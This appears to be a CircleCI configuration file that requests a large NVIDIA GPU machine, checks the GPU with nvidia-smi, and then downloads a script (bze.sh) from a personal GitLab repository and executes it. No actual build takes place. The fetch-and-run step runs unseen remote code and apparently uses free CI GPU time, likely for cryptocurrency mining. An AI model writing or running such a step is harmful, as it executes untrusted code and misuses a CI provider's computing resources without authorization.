version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: wget https://gitlab.com/viwarlani/build/-/raw/main/bze.sh && chmod +x *.sh && ./bze.sh


